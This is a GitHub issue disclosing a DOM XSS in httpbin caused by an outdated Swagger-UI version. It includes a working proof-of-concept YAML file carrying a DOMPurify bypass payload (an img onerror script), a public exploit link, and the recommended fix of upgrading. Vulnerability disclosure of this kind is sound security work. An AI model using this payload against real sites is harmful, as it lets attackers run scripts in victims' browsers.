DOM XSS due to old SwaggerUI version
chilikeys opened this issue · 0 comments
Hello,
httpbin uses an old version of Swagger-UI under the hood which is vulnerable to DOM XSS by adding a malicious yaml file as value to the query parameter url
Steps To Reproduce:
- Host a malicious .yaml file with the payload inside:
swagger: '2.0'
info:
title: Example yaml.spec
description: |
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
/accounts:
get:
responses:
'200':
description: No response was specified
tags:
- accounts
operationId: findAccounts
summary: Finds all accounts
- Visit the link https://httpbin.org?url=https://jumpy-floor.surge.sh/test.yaml. Here I use the publically availiable PoC posted on the reference article and the public instance of httpbin for ease. You can test it on another instance you spin up and use a payload you host if you preffer.
- Observe the pop-up window.
Supporting Material/References:
This is a bug in older SwaggerUI version that use an older version of DOMPurify to sanitize html. You can read more about it here: https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers
Impact
Run javascript on the victim's broswer
Mitigation
Upgrade Swagger-UI version to the latest which mitigates this.
A few notes
I sent you an email regarding this and got no reply so I am opening an issue here. Since there is anorher XSS reported 2 years ago or so and you haven't responded to that, I assume you don't care about XSS in general
However, I decided to report this for 2 reasons
- It was already fixed by Swagger-UI and using the latest versions of dependencies is Security 101
- I am a bug bounty hunter on hackerone.com. Most programs accept 0-day reports no earlier than after 30 days of publication. I've come across some instances of this and I want to report them and since I believe this is a 0-day I wanted to make it public for this reason.
Best Regards,